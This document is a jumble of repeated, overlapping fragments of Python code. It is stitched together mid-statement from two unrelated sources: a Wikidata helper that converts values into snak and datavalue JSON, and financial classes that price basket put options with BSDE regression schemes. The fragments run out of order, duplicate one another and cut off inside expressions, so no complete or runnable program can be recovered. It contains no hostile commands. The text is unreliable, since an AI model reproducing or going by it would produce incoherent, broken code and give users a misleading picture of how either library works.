\"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"}", "\"type\": \"string\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype", "\"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif", "Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\":", "{\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\":", ") elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]:", "buildDataValue(datatype, value) return { 
\"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue, \"datatype\": datatype, }", "if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can", "datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else:", "return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\": {\"value\": value},", "microsecond=0) valueObj: Dict[str, Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\":", "Any] = { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0,", "== \"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value)", "to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str,", "== \"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value)", "\"string\"} elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise", "== \"monolingualtext\": if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise", "datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\":", "value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "= { \"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\":", "{\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0,", "== dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return {\"value\":", "\"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\":", "str, value): datatype = getPropertyType(propertyId) datavalue 
= buildDataValue(datatype, value) return { \"snaktype\": \"value\",", "getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", \"property\": propertyId, \"datavalue\": datavalue,", "\"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"}", "{type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) == dict:", "value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can", "{datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\",", "if type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can", "valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype", "dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not convert type", "not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value)", "\"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert", "[ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict:", "elif type(value) == str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError(", "dict: return {\"value\": value, \"type\": \"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0,", "type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]:", ") elif datatype == \"time\": if type(value) == dict: return {\"value\": value, \"type\":", "= getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\": \"value\", 
\"property\": propertyId, \"datavalue\":", "jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value)", "to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) == dict: return", "\"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise", "type {type(value)} to datatype {datatype}\" ) else: raise NotImplementedError(f\"Datatype {datatype} not implemented\") def", "type {type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\",", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if type(value)", "\"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\", ]: if type(value) == dict: return {\"value\": value, \"type\":", "elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value,", "+ \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", }", "\"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value) == dict: return {\"value\": value,", "\"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not", "\"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype in", "from datetime import datetime from typing import Any, Dict from .wikidatasession import WikidataSession", "]: if type(value) == dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) ==", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) 
else: raise NotImplementedError(f\"Datatype {datatype}", "{type(value)} to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict:", "json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\",", "in [int, float]: valueObj = { \"amount\": \"%+f\" % value, \"unit\": \"1\", }", "def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\", \"wikibase-property\",", "raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) else: raise", "{\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\":", "{\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can", "{type(value)} to datatype {datatype}\" ) elif datatype == \"time\": if type(value) == dict:", "datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"} else:", "= { \"action\": \"query\", \"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\":", "value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise", "datetime from typing import Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId:", "\"commonsMedia\", ]: if type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value)", "value} return {\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type", "{datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\": value,", "return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not convert type {type(value)}", "\"type\": 
\"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return", "{ \"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"}", "return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value = {\"entity-type\": datatype[9:],", "DATA = repo.get(query) jsonstr = list(DATA[\"query\"][\"pages\"].values())[0][\"revisions\"][0][\"*\"] content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype:", "raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype", "datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if type(value)", "convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value)", "@functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\", \"format\":", "type(value) == dict: return {\"value\": value, \"type\": \"monolingualtext\"} else: raise TypeError( f\"Can not", "+ cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11, \"calendarmodel\":", "import functools import json from datetime import datetime from typing import Any, Dict", "\"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query)", "str: return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert", "\"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" )", "return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj = {", "WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\",", "\"quantity\"} if type(value) in [int, float]: valueObj = { \"amount\": 
\"%+f\" % value,", "f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif datatype in [", "{datatype}\" ) elif datatype == \"quantity\": if type(value) == dict: return {\"value\": value,", "from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession() query =", "else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\" ) elif", "{\"value\": value, \"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to", "\"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA = repo.get(query) jsonstr =", "elif datatype == \"globe-coordinate\": if type(value) == dict: return {\"value\": value, \"type\": \"globecoordinate\"}", "dict: return {\"value\": value, \"type\": \"quantity\"} if type(value) in [int, float]: valueObj =", "return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\",", "\"amount\": \"%+f\" % value, \"unit\": \"1\", } return {\"value\": valueObj, \"type\": \"time\"} else:", "def getPropertyType(propertyId: str): repo = WikidataSession() query = { \"action\": \"query\", \"format\": \"json\",", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"globe-coordinate\": if type(value) ==", "\"format\": \"json\", \"prop\": \"revisions\", \"titles\": \"Property:\" + propertyId, \"rvprop\": \"content\", } DATA =", "== dict: return {\"value\": value, \"type\": \"globecoordinate\"} else: raise TypeError( f\"Can not convert", ") elif datatype == \"quantity\": if type(value) == dict: return {\"value\": value, \"type\":", "\"time\"} if type(value) == datetime: cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0) valueObj: Dict[str,", "\"time\": if type(value) == dict: return {\"value\": value, \"type\": \"time\"} if type(value) ==", "\"before\": 0, \"after\": 0, \"precision\": 
11, \"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\":", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype in [ \"string\",", "\"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\": 11,", "\"time\": \"+\" + cleanedDateTime.isoformat() + \"Z\", \"timezone\": 0, \"before\": 0, \"after\": 0, \"precision\":", "\"calendarmodel\": \"http://www.wikidata.org/entity/Q1985727\", } return {\"value\": valueObj, \"type\": \"time\"} else: raise TypeError( f\"Can not", "type(value) == dict: return {\"value\": value, \"type\": \"string\"} elif type(value) == str: return", "datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) == dict: return {\"value\":", "type(value) == str: value = {\"entity-type\": datatype[9:], \"id\": value} return {\"value\": value, \"type\":", "not convert type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if", "raise NotImplementedError(f\"Datatype {datatype} not implemented\") def buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue", "Any, Dict from .wikidatasession import WikidataSession @functools.lru_cache() def getPropertyType(propertyId: str): repo = WikidataSession()", "elif datatype in [ \"string\", \"tabular-data\", \"geo-shape\", \"url\", \"musical-notation\", \"math\", \"commonsMedia\", ]: if", "return {\"value\": {\"value\": value}, \"type\": \"string\"} else: raise TypeError( f\"Can not convert type", "to datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict: return", "content = json.loads(jsonstr) return content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [", "content[\"datatype\"] def buildDataValue(datatype: str, value): if datatype in [ \"wikibase-lexeme\", \"wikibase-form\", \"wikibase-sense\", \"wikibase-item\",", "{\"value\": value, \"type\": \"quantity\"} if type(value) in [int, 
float]: valueObj = { \"amount\":", "buildSnak(propertyId: str, value): datatype = getPropertyType(propertyId) datavalue = buildDataValue(datatype, value) return { \"snaktype\":", "== dict: return {\"value\": value, \"type\": \"wikibase-entity\"} elif type(value) == str: value =", "type {type(value)} to datatype {datatype}\" ) elif datatype == \"quantity\": if type(value) ==", "datatype {datatype}\" ) elif datatype == \"monolingualtext\": if type(value) == dict: return {\"value\":", "\"type\": \"wikibase-entity\"} else: raise TypeError( f\"Can not convert type {type(value)} to datatype {datatype}\"", "datatype == \"quantity\": if type(value) == dict: return {\"value\": value, \"type\": \"quantity\"} if" ]
[ "0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float)", "np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate =", "expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ +", "for the BSDE. .. todo:: Moving the numerical scheme to the function file", "0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets,", "2018 @author: <NAME> This file holds the parameters for all specific example and", "self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient,", "rate, price_coefficient, delta_coefficient, delta_process): temp = \\ (1 - (1-theta[0]) * rate *", "k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 -", "rec # Reference Solution reference_riskfree = False refererce_adjust = False # Under development", "= 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis,", "* np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\", "= 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock", "(1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar +", "self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\\ + (1/theta[1]) *", "1. 
self.put_call = \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\"", "- self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1", "(1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\ - delta_t", "= 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model =", "self.put_call = \"Put\" def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp", "= 40. * np.ones(dimension) self.num_of_assets = dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension,", "-> lm', \\ (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis) return riskfree_delta", "self.variation_margin_interest_rate) *\\ riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t *", "1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate,", "adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :],", "functions and parameters sorting_method = \"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order =", "* theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield -", "* np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse,", "= 40. self.terminal_time = 1. self.buy_sell = 1. 
self.put_call = \"Put\" def riskfree_scheme_price(self,", "self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix = 0.75", "/ (1 + rate * delta_t * theta[0]) def riskfree_scheme_delta(self, theta, delta_t, expect_basis,", "price_coefficient, expect_brownian_basis)\\ - delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm", "model\" self.dimension = dimension # Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield", "- theta[0]) * np.einsum('i, ji, jk, lk -> l', (self.mu_bar + self.divident_yield -", "expect_brownian_basis, rate, price_coefficient, delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij,", "derivative, delta, adjusted_derivative, adjusted_delta): rec = np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i", "0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse =", "- self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0] *", "riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions riskless_rate", "riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec", "self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value", "= np.linalg.inv(cholesky_decomposition) # Market parameters and functions 
riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets,", "derivative.reshape(-1) for i in range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] =", "Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters and functions self.riskless_rate", "= False # Under development class GeometicBasketPut(): def __init__(self, dimension): # Market parameters", "riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float) bank_bond_yield = 0 counterparty_bond_yield = 0", "delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis,", "+ self.num_of_brownian_motion def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process): temp =", "0., 0.],\\ [0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84,", "6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return", "reference_riskfree = False reference_riskfree_price = -0.175866 refererce_adjust = False class ArithmeticBasketPut(): def __init__(self,", "regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate", "put option for BS model\" self.dimension = dimension # Market parameters and functions", "* theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) def regression_variable(self, no_of_samples, derivative,", "i in range(self.num_of_brownian_motion): rec[:, i+1] = delta[:, i] rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1) for", ", regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis,", "np.linalg.inv(cholesky_decomposition) # Market parameters and functions 
riskless_rate = 0.05 divident_yield = np.zeros(num_of_assets, dtype=float)", "the BSDE. .. todo:: Moving the numerical scheme to the function file \"\"\"", "0.01, 0.01, 0.01, 0.01]) num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05", "This file holds the parameters for all specific example and the numerical scheme", "num_of_assets = 5 num_of_brownian_motion = 5 mu_bar = 0.05 * np.ones(num_of_assets, dtype=float) sigma_bar", "Information self.name = \"Arithmetic basket put option for BS model\" self.dimension = dimension", "Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis = \"Intrinsic Value\" self.basis_order", "0. self.counterparty_bond_repo_rate = 0. self.variation_margin_interest_rate = 0.1 self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float)", "Market parameters and functions self.riskless_rate = 0.06 self.bank_bond_yield = 0. self.counterparty_bond_yield = 0.", "(1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\\", "delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta,", "range(1,6): rec[:, i] = delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in", "counterparty_bond_yield = 0 counterparty_bond_repo_rate = 0 variation_margin_interest_rate = 0.1 stock_repo_rate = 0.07 *", "\"Put option for a 5 stocks German index model\" dimension = 5 #", "for i in range(7,12): rec[:, i] = adjusted_delta[:, i-7] return rec # Reference", "= adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False reference_riskfree_price =", "self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\\ - delta_t * (1 - theta[0]) * np.einsum('i, ji, jk,", "= 1. buy_sell = -1. 
put_call = \"Put\" # Regression functions and parameters", "delta_t * theta[0])\\ + delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield", "* theta[0]) return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1)) # Product parameters weight", "\"Intrinsic Value\" basis = \"Intrinsic Value\" basis_order = 3 no_of_regression = 1 +", ", regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\\ + delta_t * theta[0] * (self.bank_bond_yield +", "+ self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0,", "* np.ones(dimension, dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call", "0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse", "expect_brownian_basis): riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price", "self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis,", "rec[:, i] = adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False", "i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) *", "self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis) return temp / (1 + rate *", "np.array([[1., 0., 0., 0., 0.],\\ [0.79, 0.613107, 0., 0., 0.],\\ [0.82, 0.134071, 0.556439,", "the parameters for all specific example and the numerical scheme for the BSDE.", "Information name = \"Put option for a 5 stocks German index model\" dimension", "reference_riskfree_price = -0.175866 
refererce_adjust = False class ArithmeticBasketPut(): def __init__(self, dimension): # Example", "= dimension self.num_of_brownian_motion = dimension self.divident_yield = np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate -", "= \"Put\" # Regression functions and parameters self.sorting_method = \"Intrinsic Value\" self.basis =", "delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion:", "i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i] return rec", "dtype=np.single) self.strike = 40. self.terminal_time = 1. self.buy_sell = 1. self.put_call = \"Put\"", "= adjusted_derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:,", "self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :], regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\\ + delta_t * theta[0]", "= delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i]", "refererce_adjust = False # Under development class GeometicBasketPut(): def __init__(self, dimension): # Market", "[0.84, 0.157232, 0.0181865, 0.291768, 0.429207]]) cholesky_inverse = np.linalg.inv(cholesky_decomposition) # Market parameters and functions", "Value\" self.basis_order = 3 self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion", "ArithmeticBasketPut(): def __init__(self, dimension): # Example Information self.name = \"Arithmetic basket put option", "the numerical scheme to the function file \"\"\" import numpy as np class", ".. 
todo:: Moving the numerical scheme to the function file \"\"\" import numpy", "*\\ np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield", "dtype=float) # Stock parameters self.stock_model = \"BS\" self.initial_value = 40. * np.ones(dimension) self.num_of_assets", "delta_coefficient): riskfree_delta = \\ - (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis,", "np.zeros(dimension, dtype=float) self.mu_bar = self.riskless_rate - self.divident_yield self.sigma_bar = 0.2 * np.ones(dimension) self.correlation_matrix", "regression_coeff[0, :], regression_coeff[1:6, :]) riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :],", "expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:], regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion,", "delta[:, i-1] rec[:, 6] = adjusted_derivative.reshape(-1) for i in range(7,12): rec[:, i] =", "adjusted_delta[:, i-7] return rec # Reference Solution reference_riskfree = False refererce_adjust = False", "[0.82, 0.134071, 0.556439, 0., 0.],\\ [0.91, 0.132277, 0.0109005, 0.39279, 0.],\\ [0.84, 0.157232, 0.0181865,", "basis_order = 3 no_of_regression = 1 + 5 + 1 + 5 def", "adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :],", "ijk-> ik', regression_coeff[0, :], expect_brownian_basis) adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield", "dtype=float) sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530]) cholesky_decomposition = np.array([[1., 0., 0.,", "numpy as np class GermenIndexPut(): # Example Information name = \"Put option for", 
"regression_coeff[1:6, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield", "expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta) adjusted_delta = \\ self.riskfree_scheme_delta(theta, delta_t,", "= np.empty((no_of_samples, self.no_of_regression)) rec[:,0] = derivative.reshape(-1) for i in range(self.num_of_brownian_motion): rec[:, i+1] =", "and the numerical scheme for the BSDE. .. todo:: Moving the numerical scheme", ":], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t *", "5 + 1 + 5 def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta): rec", "- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm',", "(1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \\ (self.mu_bar + self.divident_yield -", "* np.ones((dimension, dimension)) self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix) 